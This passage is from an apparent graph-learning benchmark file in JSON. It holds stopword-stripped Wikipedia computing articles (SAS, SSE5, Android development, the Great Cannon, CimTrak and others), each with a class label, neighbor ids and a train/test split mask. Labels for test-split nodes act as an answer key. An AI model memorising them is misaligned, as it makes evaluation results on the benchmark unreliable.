sas 76 open architecture allowed compilers procedures input infile statements improved could read data formats used ibm mainframes generating reports also added put file statements ability analyze general linear models also added format procedure allowed developers customize appearance data 1979 sas 79 added support cms operating system introduced datasets procedure three years later sas 82 introduced early macro language append procedure sas version 4 limited features made sas accessible version 5 introduced complete macro language array subscripts full-screen interactive user interface called display manager 1985 sas rewritten c programming language allowed sas multivendor architecture allows software run unix ms-dos windows previously written pl/i fortran assembly language 1980s 1990s sas released number components complement base sas sas/graph produces graphics released 1980 well sas/ets component supports econometric time series analysis component intended pharmaceutical users sas/ph-clinical released 1990s food drug administration standardized sas/ph-clinical new drug applications 2002 vertical products like sas financial management sas human capital management called cfo vision hr vision respectively also introduced jmp developed sas co-founder john sall team developers take advantage graphical user interface introduced 1984 apple macintosh shipped first time 1989 updated versions jmp released continuously 2002 recent release 2016 sas version 6 used throughout 1990s available wider range operating systems including macintosh os/2 silicon graphics primos sas introduced new features dot-releases 6.06 6.09 user interface based windows paradigm introduced support sql added version 7 introduced output delivery system ods improved text editor ods improved upon successive releases example output options added version 8 number operating systems supported reduced unix windows z/os linux added sas version 8 sas enterprise miner released 1999 2002 text miner software introduced text miner analyzes text data like emails patterns business intelligence applications 2004 sas version 9.0 released dubbed project mercury designed make sas accessible broader range business users version 9.0 added custom user interfaces based user role established point-and-click user interface sas enterprise guide software primary graphical user interface gui customer relationship management crm features improved 2004 sas interaction management 2008 sas announced project unity designed integrate data quality data integration master data management sas institute inc v world programming ltd lawsuit developers competing implementation world programming system alleging infringed sas copyright part implementing functionality case referred united kingdom high court justice european court justice 11 august 2010 may 2012 european court justice ruled favor world programming finding functionality computer program programming language protected copyright free version introduced students 2010 sas social media analytics tool social media monitoring engagement sentiment analysis also released year sas rapid predictive modeler rpm creates basic analytical models using microsoft excel introduced year jmp 9 2010 added new interface using r programming language jmp add-in excel following year high performance computing appliance made available partnership teradata emc greenplum 2011 company released enterprise miner 7.1 company introduced 27 data management products october 2013 october 2014 updates 160 others 2015 sas global forum announced several new products specialized different industries well new training software sas many releases since 1972 since release 9.3 sas/stat release numbering 2011 sas largest set products line customer intelligence numerous sas modules web social media marketing analytics may used profile customers prospects predict behaviors manage optimize communications sas also provides sas fraud framework framework primary functionality monitor transactions across different applications networks partners use analytics identify anomalies indicative fraud sas enterprise grc governance risk compliance provides risk modeling scenario analysis functions order manage visualize risk compliance corporate policies also sas enterprise risk management product-set designed primarily banks financial services organizations sas products monitoring managing operations systems collectively referred sas management solutions sas collects data various assets performance utilization creates reports analyses sas performance management products consolidate provide graphical displays key performance indicators kpis employee department organizational level sas supply chain intelligence product suite offered supply chain needs forecasting product demand managing distribution inventory optimizing pricing also sas sustainability management set software forecast environmental social economic effects identify causal relationships operations impact environment ecosystem sas product sets specific industries government retail telecommunications aerospace marketing optimization high-performance computing sas also offers free university edition downloaded anyone used non commercial use first announcement regarding free university edition seems appeared newspapers 28 may 2014 hence said university edition available freely since 2005 article journal marriage family comparing statistical packages sas competitors stata spss alan c. acock wrote sas programs provide extraordinary range data analysis data management tasks difficult use learn spss stata meanwhile easier learn better documentation less capable analytic abilities though could expanded paid spss free stata add-ons acock concluded sas best power users occasional users would benefit spss stata comparison university california los angeles gave similar results competitors revolution analytics alpine data labs advertise products considerably cheaper sas 2011 comparison doug henschen informationweek found start-up fees three similar though admitted starting fees necessarily best basis comparison sas business model weighted heavily initial fees programs instead focusing revenue annual subscription fees according idc sas largest market-share holder advanced analytics 35.4 percent market 2013 fifth largest market-share holder business intelligence bi software 6.9 share largest independent vendor competes bi market conglomerates sap businessobjects ibm cognos spss modeler oracle hyperion microsoft power bi sas named gartner leader quadrant data integration tool business intelligence analytical platforms study published 2011 bmc health services research found sas used 42.6 percent data analyses health service research based sample 1,139 articles drawn three journals",
    "neighbors": [
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      10508,
      6419,
      2457,
      2168,
      7580,
      7326,
      5678,
      7983,
      6962,
      8502,
      823,
      4667,
      8509,
      6718,
      963,
      10051,
      5830,
      5703,
      4808,
      5833,
      4042,
      5450,
      8011,
      9166,
      2000,
      9944,
      4057,
      4186,
      477,
      8440,
      10848,
      10340,
      4840,
      6248,
      363,
      5612,
      623,
      5492,
      7924,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2653,
    "label": 2,
    "text": "Trap_(computing):trap computing computing operating systems trap also known exception fault typically type synchronous interrupt caused exceptional condition e.g. breakpoint division zero invalid memory access trap usually results switch kernel mode wherein operating system performs action returning control originating process trap system process serious trap user process systems fatal usages term trap refers specifically interrupt intended initiate context switch monitor program debugger deriving original usage trap sometimes used mechanism intercepting normal control flow domains snmp trap type pdu used report alert asynchronous event managed subsystem",
    "neighbors": [
      4423,
      8551,
      7471,
      10224,
      5457,
      9171,
      10333,
      10516,
      11539,
      663,
      6296,
      3133,
      2334,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 2654,
    "label": 4,
    "text": "360_Safeguard:360 safeguard 360 safeguard 360 total security program developed qihoo 360 internet security company based china 360 safeguard focus stopping malware computer viruses trojan horses providing security patches microsoft windows 360 safeguard trojan horse scanner cloud-based heuristics engine built scanner 2010 360 safeguard analyzed qq protocol accused qq automatically scanning users computers uploading personal information qq servers without users consent response tencent called 360 malware denied users 360 installed access qq services chinese ministry industry information reprimanded companies improper competition ordered come accord 30 april 2015 three independent security testing bodies av-comparatives av-test virus bulletin published joint press release criticizing qihoo 360 found qihoo 360 submitted products comparative behaved significantly different end user products products comparative used engine bitdefender end user products use qihoo 360 qvm engine instead testing bodies claimed end user products would provide considerably lower level protection higher likelihood false positives consequence three testing bodies revoked certifications rankings earlier year qihoo 360 denied cheating allegations claiming qvm engine developed qihoo 360 would effective china",
    "neighbors": [
      2049,
      4994,
      131,
      5891,
      7809,
      10756,
      1417,
      3981,
      3342,
      6797,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8493,
      7983,
      8615,
      6834,
      4403,
      9523,
      10166,
      823,
      7739,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      7515,
      8668,
      9055,
      9569,
      4194,
      3941,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 2655,
    "label": 3,
    "text": "SSE5:sse5 sse5 short streaming simd extensions version 5 simd instruction set extension proposed amd august 30 2007 supplement 128-bit sse core instructions amd64 architecture amd chose implement sse5 originally proposed may 2009 amd replaced sse5 three smaller instruction set extensions named xop fma4 f16c retain proposed functionality sse5 encode instructions differently better compatibility intel proposed avx instruction set three sse5-derived instruction sets introduced bulldozer processor core released october 2011 32 nm process amd sse5 extension bundle include full set intel sse4 instructions making competitor sse4 rather successor complicates software development recommended practice program test presence instruction set extensions means cpuid instruction entering code path depends upon instructions function correctly maximum portability optimized application require three code paths base code path compatibility older processors either vendor separately optimized intel code path exploiting sse4 avx separately optimized amd code path exploiting sse5 due proliferation benchmarks intel amd processors increasingly reflect cleverness implementation quality divergent code paths rather strength underlying platform proposed sse5 instruction set consisted 170 instructions including 46 base instructions many designed improve single-threaded performance sse5 instructions 3-operand instructions use increase average number instructions per cycle achievable x86 code selected new instructions include amd claims sse5 provide dramatic performance improvements particularly high-performance computing hpc multimedia computer security applications including 5x performance gain advanced encryption standard aes encryption 30 performance gain discrete cosine transform dct used process video streams detailed information consult instruction sets subsequently divided sse5 specification included proposed extension general coding scheme x86 instructions order allow instructions two operands 2008 intel announced planned avx instruction set proposed different way coding instructions two operands two proposed coding schemes sse5 avx mutually incompatible although avx scheme certain advantages sse5 scheme importantly avx plenty space future extensions including larger vector sizes may 2009 amd published revised specification planned future instructions revision changes coding scheme make compatible avx scheme differing prefix byte order avoid overlap instructions introduced amd instructions introduced intel revised instruction set longer carries name sse5 criticized misleading instructions new revision functionally identical original sse5 specification—only way instructions coded differs planned additions amd instruction set consists three subsets new instruction sets include support future extensions vector size 128 bits 256 bits unclear preliminary specifications whether bulldozer processor support 256-bit vector registers ymm registers",
    "neighbors": [
      3459,
      2821,
      4491,
      6924,
      4237,
      10383,
      6038,
      9369,
      7963,
      9500,
      1915,
      2088,
      9391,
      8120,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      5326,
      977,
      2514,
      5329,
      5844,
      9428,
      8795,
      1122,
      7783,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      4603,
      10620,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2656,
    "label": 4,
    "text": "CimTrak:cimtrak cimtrak computer software file integrity monitoring regulatory compliance auditing assists ensuring availability integrity critical assets detecting root-cause responding immediately unexpected changes host operating system applications network devices located infrastructure cimtrak works cross-platform supported multiple windows linux unix macintosh operating systems licensed commercial software cimtrak multiple core components cimtrak many functions detect additions deletions modifications files configurations computer operating systems components installed operating system initial configuration takes snapshot files configurations operating system uses data create cryptographic hash files configurations stores securely cimtrak master repository known good baseline cimtrak agents installed operating systems containing data configured monitoring case network device agent installed systems tcp/ip network connection supported network devices agent detects changes made monitored files configurations communicating kernel comparing changes known cryptographic hash associated affected files configurations calculated cryptographic hash different known baseline cimtrak initiate user-configured corrective action defined cimtrak object group policy send internal external event notifications using one many following methods cimtrak provides insight infrastructure detecting changes could compromise servers networks sensitive customer data payment card information payment card industry data security standard pci provide instant change remediation options without requiring integration external applications change detected cimtrak captures change exact moment occurs provides detailed audit trail incident including cimtrak report automated response taken configured initiate remediation automated responses termed corrective actions include corrective actions defined based type change action file/configuration addition file/configuration change file/configuration deletion addition automated remediation functionality cimtrak automatically launch different custom scripts based detected change type cimtrak file system agents network device agents perform change management functions monitoring file configurations based configured object group watch policies abilities vary operating system cimtrak plug-ins enhance abilities cimtrak adding additional monitoring functions attach tofile system agents network device agents plug-ins include cimtrak constructed follow software communication security standards government security product certifications information stored within cimtrak secure external modification access data rest data transit encrypted using cimcor cryptographic module several certifications including federal information processing standard fips publication 140-2 fips pub 140-2 u.s. government computer security standard used accredit cryptographic modules level 1 indicates cryptographic module supports lowest level acceptable security security level 1 allows cryptographic module executed using unevaluated operating system security level 2 enhances physical security mechanisms security level 1 adding requirement tamper-evidence protection common criteria information technology security evaluation common criteria cc international standard international organization standardization iso international electrotechnical commission iec 15408 computer security certification common criteria allows specifying verifying vendor claims relating security functionality assurance requirements verification claims performed using approved testing laboratories evaluation assurance level eal4 permits developer gain maximum assurance positive security engineering based good commercial development practices though rigorous require substantial specialist knowledge skills resources eal4 highest level likely economically feasible retrofit existing product line eal4 therefore applicable circumstances developers users require moderate high level independently assured security conventional commodity toes prepared incur additional security-specific engineering costs augmented alc_flr.2 establishes verifies claim developer established flaw remediation procedures describe tracking security flaws identification corrective actions distribution corrective action information toe users cimcor flagship software cimtrak file integrity monitoring tool department defense unified capabilities approved products list unique factor allows cimtrak file integrity monitoring product available use within department defense boundaries products contained united states army approved products list deemed acceptable use within boundaries united states army cimtrak application used facilitate following compliance security objectives microsoft windows versions linux versions microsoft windows versions microsoft windows versions unix linux versions",
    "neighbors": [
      6273,
      6797,
      5523,
      8471,
      1304,
      4505,
      1435,
      4777,
      7983,
      9909,
      823,
      3133,
      9665,
      8904,
      847,
      10962,
      4316,
      11363,
      6372,
      4074,
      5612,
      8944,
      5492,
      1399,
      8700,
      2045,
      2558,
      7295
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2657,
    "label": 4,
    "text": "GTRI_Cyber_Technology_and_Information_Security_Laboratory:gtri cyber technology information security laboratory cyber technology information security laboratory ctisl one eight labs georgia tech research institute created october 1 2010 focuses cyber security along gtri information communications laboratory part information cyber sciences directorate gtri ctisl known commitment open source software feature existing business areas secure information systems resilient command control emerging areas cyberwarfare laboratory additionally part georgia tech information security center",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2658,
    "label": 2,
    "text": "Android_software_development:android software development android software development process new applications created devices running android operating system google states android apps written using kotlin java c++ languages using android software development kit sdk using languages also possible non-jvm languages go javascript c c++ assembly need help jvm language code may supplied tools likely restricted api support programming languages tools allow cross-platform app support i.e android ios third party tools development environments language support also continued evolve expand since initial sdk released 2008 addition major business entities like walmart amazon bank america eyeing engage sell mobiles mobile application development witnessing transformation android software development kit sdk includes comprehensive set development tools include debugger libraries handset emulator based qemu documentation sample code tutorials currently supported development platforms include computers running linux modern desktop linux distribution mac os x 10.5.8 later windows 7 later sdk available android software development possible using specialized android applications around end 2014 officially-supported integrated development environment ide eclipse using android development tools adt plugin though intellij idea ide editions fully supports android development box netbeans ide also supports android development via plugin 2015 android studio made google powered intellij official ide however developers free use others google made clear adt officially deprecated since end 2015 focus android studio official android ide additionally developers may use text editor edit java xml files use command line tools java development kit apache ant required create build debug android applications well control attached android devices e.g. triggering reboot installing software package remotely enhancements android sdk go hand-in-hand overall android platform development sdk also supports older versions android platform case developers wish target applications older devices development tools downloadable components one downloaded latest version platform older platforms tools also downloaded compatibility testing android applications packaged .apk format stored codice_1 folder android os folder accessible root user security reasons apk package contains .dex files compiled byte code files called dalvik executables resource files etc android sdk platform tools separately downloadable subset full sdk consisting command-line tools codice_2 codice_3 android debug bridge adb tool run commands connected android device codice_4 daemon runs device codice_2 client starts background server multiplex commands sent devices addition command-line interface numerous graphical user interfaces exist control adb format issuing commands typically example android applications saved command codice_6 file whose name codice_7 default security issue reported march 2011 adb targeted vector attempt install rootkit connected phones using resource exhaustion attack fastboot protocol tool name included android sdk package used primarily modify flash filesystem via usb connection host computer requires device started boot loader secondary program loader mode basic hardware initialization performed enabling protocol device accept specific set commands sent via usb using command line commonly used fastboot commands include code written c/c++ compiled arm x86 native code 64-bit variants using android native development kit ndk ndk uses clang compiler compile c/c++ gcc included ndk r17 removed r18 2018 native libraries called java code running android runtime using codice_8 part standard android java classes command-line tools compiled ndk installed using adb android uses bionic c library llvm libc++ c++ standard library ndk also includes variety apis zlib compression opengl es vulkan graphics opensl es audio various android-specific apis things like logging access cameras accelerating neural networks ndk includes support cmake codice_9 based gnu make android studio supports running either gradle third-party tools allow integrating ndk eclipse visual studio cpu profiling ndk also includes simpleperf similar linux perf tool better support android specifically mixed java/c++ stacks android 3.1 platform also backported android 2.3.4 introduces android open accessory support allows external usb hardware android usb accessory interact android-powered device special accessory mode android-powered device accessory mode connected accessory acts usb host powers bus enumerates devices android-powered device acts usb device android usb accessories specifically designed attach android-powered devices adhere simple protocol android accessory protocol allows detect android-powered devices support accessory mode development tools intended help android device interact external electronics include ioio android open accessory development kit microbridge triggertrap etc android :build perl cpan module enables callers build android apk file using basic command line tools aapt dx javac jarsigner zipalign without rely either apache ant gradle reduced dependency set simplifies continuous release systems rely fully automated remote app generation testing july 12 2010 google announced availability app inventor android web-based visual development environment novice programmers based mit open blocks java library providing access android devices gps accelerometer orientation data phone functions text messaging speech-to-text conversion contact data persistent storage web services initially including amazon twitter could done android ’ architecture open said project director mit hal abelson development year block-editing tool taught non-majors computer science harvard mit wellesley trinity college hartford university san francisco professor david wolber developed introductory computer science course tutorial book non-computer science students based app inventor android second half 2011 google released source code terminated web service provided funding creation mit center mobile learning led app inventor creator hal abelson fellow mit professors eric klopfer mitchel resnick latest version created result google–mit collaboration released february 2012 first version created solely mit launched march 2012 upgraded app inventor 2 december 2013 2014 app inventor maintained mit basic4android commercial product similar simple inspired microsoft visual basic 6 microsoft visual studio makes android programming much simpler regular visual basic programmers find coding java difficult basic4android active coreliu enables non-technical users write immersive educational apps run natively android devices app authors use file held github repository describe images text used app speech generated text via amazon web services polly coreliu packages photos generated speech android apk file author distribute freely using creative commons license corona sdk software development kit sdk created walter luh founder corona labs inc.. corona sdk allows software programmers build mobile applications iphone ipad android devices corona lets developers build graphic applications using integrated lua language layered top c++/opengl sdk uses subscription-based purchase model without requiring per-application royalties imposes branding requirements delphi also used creating android application object pascal language latest release delphi 10 seattle developed embarcadero user interfaces developed using cross-platform gui framework firemonkey additionally non-visual components interaction various sensors like camera gyroscope gps bluetooth etc available services access certain keyboard events available platform-independent manner well done using interfaces compiler based llvm architecture debugging ide possible generated apps based ndk contrast xamarin runtime compiled application rapid application development tool developing native android applications using javascript tool used directly mobile device via browser based ide connected device via wifi makes use google chrome v8 javascript engine since version 1.4 go programming language writing applications android supported go version 1.7 help codice_10 tool i.e codice_11 compiling android apk ios apps supported go codebase strictly speaking java/jvm code always needed run android gomobile tool provides minimal jvm code needed objective-c code needed case ios go support restricted go types used currently restricted set android apis e.g openal opengl es 2 bindings provided could used make 2d/3d games one provided examples android ios graphics applications hypernext android creator hac software development system aimed beginner programmers help create android apps without knowing java android sdk based hypercard treated software stack cards one card visible one time well suited mobile phone applications one window visible time hypernext android creator main programming language simply called hypernext loosely based hypercard hypertalk language hypernext interpreted english-like language many features allow creation android applications supports growing subset android sdk including versions gui control types automatically runs background service apps continue run process information background kivy open source python library developing multitouch application software natural user interface nui wide selection devices kivy provides possibility maintaining single application numerous operating systems code run everywhere kivy custom-built deployment tool deploying mobile applications called bulldozer available linux bulldozer currently alpha software far less cumbersome older kivy deployment methods applications programmed kivy submitted android mobile application distribution platform lazarus ide may used develop android applications using object pascal pascal dialects based free pascal compiler starting version 2.7.1 processing environment also uses java language supported android mode since version 1.5 integration device camera sensors possible using ketai library qt android enables qt 5 applications run devices android v2.3.3 api level 10 later qt cross-platform application framework target platforms android linux ios sailfish os windows qt application development done standard c++ qml requiring android ndk sdk qt creator integrated development environment provided qt framework multi-platform application development rubymotion toolchain write native mobile apps ruby version 3.0 rubymotion supports android rubymotion android apps call entire set java android apis ruby use 3rd-party java libraries statically compiled machine code sdl library offers also development possibility beside java allowing development c simple porting existing sdl native c applications injection small java shim jni usage native sdl code possible allowing android ports like e.g jagged alliance 2 video game microsoft shipped 2015 free stand-alone emulator android dubbed visual studio emulator android emulator supports installation google play drag-and-drop interface work conjunction visual studio supports cross-platform development letting c++ developers create projects templates android native-activity applications create high-performance shared libraries include solutions features include platform-specific intellisense breakpoints device deployment emulation c shared codebase developers use xamarin write native ios android windows apps native user interfaces share code across multiple platforms square built lot android based libraries used android applications third party packages popular ones retrofit http calls dagger dependency injection picasso image caching android developer challenge competition find innovative application android google offered prizes totaling 10 million us dollars distributed adc adc ii adc accepted submissions january 2 april 14 2008 50 promising entries announced may 12 2008 received 25,000 award development ended early september announcement ten teams received 275,000 ten teams received 100,000 adc ii announced may 27 2009 first round adc ii closed october 6 2009 first-round winners adc ii comprising top 200 applications announced november 5 2009 voting second round also opened day ended november 25 google announced top winners adc ii november 30 sweetdreams doodle wavesecure nominated overall winners challenge community open-source enthusiasts build share android-based distributions i.e firmware number customizations additional features flac lossless audio support ability store downloaded applications microsd card usually involves rooting device rooting allows users root access operating system enabling full control phone rooting several disadvantages well including increased risk hacking high chances bricking losing warranty increased virus attack risks etc also possible install custom firmware although device boot loader must also unlocked custom firmware allows users older phones use applications available newer releases firmware packages updated frequently incorporate elements android functionality n't yet officially released within carrier-sanctioned firmware tend fewer limitations cyanogenmod omfgb examples firmware september 24 2009 google issued cease desist letter modder cyanogen citing issues re-distribution google closed-source applications within custom firmware even though android os open source phones come packaged closed-source google applications functionality google play gps navigation google asserted applications provided approved distribution channels licensed distributors cyanogen complied google license continued distribute mod without proprietary software provided method backup licensed google applications mod install process restore process complete obstacles development include fact android use established java standards java se prevents compatibility java applications written platforms written android platform android reuses java language syntax semantics provide full class libraries apis bundled java se however multiple tools market companies myriad group upontek provide java android conversion services android provides gui classes provide java awt swing javafx support full java beans api android created open handset alliance led google early feedback developing applications android platform mixed issues cited include bugs lack documentation inadequate qa infrastructure public issue-tracking system google announced issue tracker january 18 2008 december 2007 mergelab mobile startup founder adam macbeth stated functionality poorly documented n't work ... clearly ready prime time despite android-targeted applications began appear week platform announced first publicly available application snake game preview release android sdk released november 12 2007 july 15 2008 android developer challenge team accidentally sent email entrants android developer challenge announcing new release sdk available private download area email intended winners first round android developer challenge revelation google supplying new sdk releases developers others keeping arrangement private led widely reported frustration within android developer community time august 18 2008 android 0.9 sdk beta released release provided updated extended api improved development tools updated design home screen detailed instructions upgrading available already working earlier release september 23 2008 android 1.0 sdk release 1 released according release notes included mainly bug fixes although smaller features added also included several api changes 0.9 version multiple versions released since developed december 5 2008 google announced first android dev phone sim-unlocked hardware-unlocked device designed advanced developers modified version htc dream phone developers use regular consumer devices test use applications developers may choose dedicated unlocked no-contract device one million applications developed android 25 billion downloads june 2011 research indicated 67 mobile developers used platform time publication android smartphone shipments forecast exceed 1.2 billion units 2018 85 market share",
    "neighbors": [
      4096,
      5637,
      11271,
      1032,
      7176,
      8719,
      3600,
      7700,
      9244,
      10780,
      11294,
      5663,
      3618,
      1578,
      2603,
      3626,
      5677,
      10284,
      7727,
      3633,
      1083,
      572,
      10817,
      8771,
      6212,
      69,
      7750,
      8262,
      4171,
      4683,
      4685,
      7246,
      11343,
      3664,
      7253,
      8280,
      10841,
      3162,
      8285,
      607,
      2658,
      6763,
      5743,
      8303,
      8304,
      8821,
      9848,
      3705,
      5754,
      8315,
      8316,
      8825,
      8829,
      11391,
      3712,
      1666,
      7812,
      1670,
      8326,
      7816,
      5262,
      6800,
      11408,
      2195,
      1687,
      10393,
      8858,
      7835,
      6301,
      1694,
      673,
      7841,
      8870,
      1191,
      4777,
      3248,
      7857,
      1203,
      11446,
      6143,
      7359,
      6338,
      196,
      3269,
      3782,
      8907,
      6860,
      10445,
      4305,
      2259,
      3795,
      4822,
      1240,
      8413,
      9949,
      6367,
      1761,
      1250,
      10470,
      1255,
      8423,
      2281,
      4841,
      236,
      4844,
      5356,
      8940,
      5872,
      9964,
      9970,
      10480,
      2804,
      7926,
      3836,
      7938,
      5380,
      5892,
      4358,
      7428,
      4360,
      8455,
      2828,
      4364,
      9491,
      1813,
      2837,
      280,
      10009,
      10525,
      798,
      4383,
      288,
      2852,
      4901,
      3366,
      8486,
      9509,
      10537,
      4398,
      7983,
      9011,
      3380,
      823,
      5431,
      7991,
      2875,
      3900,
      7485,
      10045,
      2368,
      1347,
      1348,
      7492,
      11590,
      11592,
      11082,
      332,
      8524,
      847,
      9039,
      3409,
      1363,
      8019,
      2901,
      6998,
      5467,
      4960,
      10080,
      5987,
      3940,
      10599,
      8554,
      5483,
      9579,
      2925,
      9078,
      7548,
      3966,
      1409,
      4995,
      3462,
      4486,
      8582,
      9610,
      4493,
      910,
      10129,
      5522,
      1427,
      5524,
      10645,
      11155,
      1435,
      10654,
      1952,
      2465,
      2978,
      9637,
      1959,
      5031,
      937,
      5546,
      3499,
      4011,
      6057,
      7595,
      8618,
      9128,
      9646,
      6067,
      6074,
      10683,
      9660,
      10684,
      3519,
      5567,
      9665,
      4550,
      11208,
      5067,
      4044,
      7629,
      4048,
      2001,
      10193,
      8147,
      3542,
      477,
      479,
      10215,
      6632,
      3561,
      3562,
      7146,
      1516,
      5100,
      5612,
      495,
      5613,
      9712,
      499,
      5620,
      11252,
      2045,
      3583
    ],
    "mask": "None"
  },
  {
    "node_id": 2659,
    "label": 5,
    "text": "TCP_global_synchronization:tcp global synchronization tcp global synchronization computer networks happen tcp/ip flows periods congestion sender reduce transmission rate time packet loss occurs routers internet normally packet queues allow hold packets network busy rather discarding routers limited resources size queues also limited simplest technique limit queue size known tail drop queue allowed fill maximum size new packets simply discarded space queue causes problems used tcp/ip routers handling multiple tcp streams especially bursty traffic present network stable queue constantly full problems except full queue results high latency however introduction sudden burst traffic may cause large numbers established steady streams lose packets simultaneously tcp automatic recovery dropped packets interprets congestion network usually correct sender reduces sending rate certain amount time tries find network longer congested increasing rate subject ramp-up known slow-start algorithm almost senders use time delay increasing rates delays expire time senders send additional packets router queue overflow packets dropped senders back fixed delay ... ad infinitum compare thundering herd problem pattern sender decreasing increasing transmission rates time senders referred global synchronization leads inefficient use bandwidth due large numbers dropped packets must retransmitted senders reduced sending rate compared stable state backed-off following loss problem subject much research consensus appears tail drop algorithm leading cause problem queue size management algorithms random early detection red weighted red reduce likelihood global synchronization well keeping queue sizes face heavy load bursty traffic",
    "neighbors": [
      10924,
      1541
    ],
    "mask": "Test"
  },
  {
    "node_id": 2660,
    "label": 9,
    "text": "RScheme:rscheme rscheme scheme implementation developed donovan kolbly object-orientation approach adapted dylan rscheme implements r4rs except transcript-on transcript-off r5rs except define-syntax addition rscheme reflective object system many operating system services modules threads systems programming features including ability integrate compile c code code rscheme compiled c c compiled normal c compiler generate machine code default keep compilation fast code size rscheme compiles bytecodes interpreted runtime virtual machine systems compiling c done on-the-fly resulting object code dynamically loaded back image execution rscheme known publicly available scheme implementation include real-time safe garbage collector",
    "neighbors": [
      2304,
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      7983,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      11221,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5612,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 2661,
    "label": 4,
    "text": "Great_Cannon:great cannon great cannon china attack tool used launch distributed denial-of-service attacks websites intercepting massive amounts web traffic redirecting targeted websites according researchers citizen lab international computer science institute princeton university center information technology policy coined term great cannon hijacks foreign web traffic intended chinese websites re-purposes flood targeted web servers enormous amounts traffic attempt disrupt operations co-located great firewall great cannon separate offensive system different capabilities design besides launching denial-of-service attacks tool also capable monitoring web traffic distributing malware targeted attacks ways similar quantum insert system used u.s. national security agency first known targets great cannon late march 2015 websites hosting censorship-evading tools including github web-based code hosting service greatfire service monitoring blocked websites china",
    "neighbors": [
      4224,
      5254,
      138,
      4883,
      8726,
      1692,
      9117,
      3625,
      5887,
      8630,
      8640,
      3777,
      2884,
      3781,
      7887,
      11221,
      7515,
      3423,
      225,
      10341,
      3688,
      2409,
      9193,
      8172,
      4725,
      5749,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2662,
    "label": 7,
    "text": "A_VerySpatial_Podcast:veryspatial podcast veryspatial podcast award winning weekly podcast provides information geography geospatial technologies podcast comments gis impact digital daily lives podcast seeks cover current trends gis technology industry receives mention industry blogs crew also interviewed directions magazine podcast opens episode number 30-second teaser podsafe song overview topics covered episode following sponsorship ad shout outs go twitter facebook followers hosts discuss 3-4 news items week relevant geography gis including new software releases web site highlighted 'webcorner moving main topic either interview someone industry discussion amongst hosts industry topic show rounds 'tip week highlights technology technique 'eventscorner highlights upcoming geography gis conferences full podsafe song teased beginning episode changes weekly podcast hosted jesse rouse sue bergeron frank lafone podcast started july 2005 since published well 200 weekly episodes numerous special episodes highlight specific topics avsp roadshow episodes cover activity geography gis conferences hosts sue bergeron frank lafone jesse rouse addition barbara maclennan blogs accompanying site veryspatial.com 2007 veryspatial llc parent organization veryspatial podcast awarded esri special achievement gis efforts disseminate information geography geospatial technologies broad audience podcasts blog veryspatial.com episodes licensed creative commons attribution share-alike noncommercial license distributed via direct download veryspatial.com website apple itunes store subscription using zune software common podcast channels download charge source show typically available two formats 64 kbit/s mp3 64 kbit/s aac 25,000 episodes downloaded per month current archived podcasts",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2663,
    "label": 2,
    "text": "Runtime_Callable_Wrapper:runtime callable wrapper runtime callable wrapper rcw proxy object generated .net common language runtime clr order allow component object model com object accessed managed code although rcw appears ordinary object .net clients primary function marshal calls data .net client com object example managed application written c might make use existing com library written c++ visual basic 6 via rcws runtime creates exactly one rcw com object regardless number references exist object runtime maintains single rcw per process object create rcw one application domain apartment pass reference another application domain apartment proxy first object used",
    "neighbors": [
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 2664,
    "label": 4,
    "text": "Institute_for_Information_Infrastructure_Protection:institute information infrastructure protection institute information infrastructure protection i3p consortium national cyber security institutions including academic research centers u.s. federal government laboratories nonprofit organizations long-standing widely recognized expertise cyber security research development r i3p managed george washington university home small administrative staff oversees helps direct consortium activities i3p coordinates funds cyber security research related critical infrastructure protection hosts high impact workshops bring together leaders public private sectors i3p brings multi-disciplinary multi-institutional perspective complex difficult problems works collaboratively stakeholders seeking solutions since founding 2002 100 researchers wide variety disciplines backgrounds worked together better understand mitigate critical risks field cyber security i3p came existence following several government assessments u.s. information infrastructure ’ susceptibility catastrophic failure first study published 1998 united states president council advisors science technology pcast recommended nongovernmental organization formed address national cyber security issues subsequent studies–by institute defense analyses well white paper jointly produced national security council office science technology policy–agreed pcast assessment affirming need organization dedicated protecting nation ’ critical infrastructures 2002 i3p founded dartmouth college grant federal government martin wybourne chaired i3p 2003 2015 since inception i3p funding i3p come various sources including department homeland security dhs national institute standards technology nist national science foundation nsf i3p consortium consists 18 academic research centers 5 national laboratories 3 nonprofit research organizations member institution appoints primary secondary representative attend regular consortium meetings advanced technological education i3p partnered community college system new hampshire ccsnh educational project “ cybersecurity healthcare industry curriculum adaptation implementation. ” funded national science foundation ’ nsf advanced technological education ate program goal project produce well-qualified technicians serve healthcare information technology needs rural northern new england i3p launched project called improving csirt skills dynamics effectiveness effort funded department homeland security science technology directorate aims explore makes sustains good csirt results help organizations ensure csirts fulfill maximum potential become invaluable tool securing cyber infrastructure interdisciplinary team working new project include cyber security business researchers dartmouth college organizational psychologists george mason university researchers practitioners hewlett-packard april 2011 i3p convened nist-sponsored workshop examining challenge integrating security usability design development software one several workshop recommendations 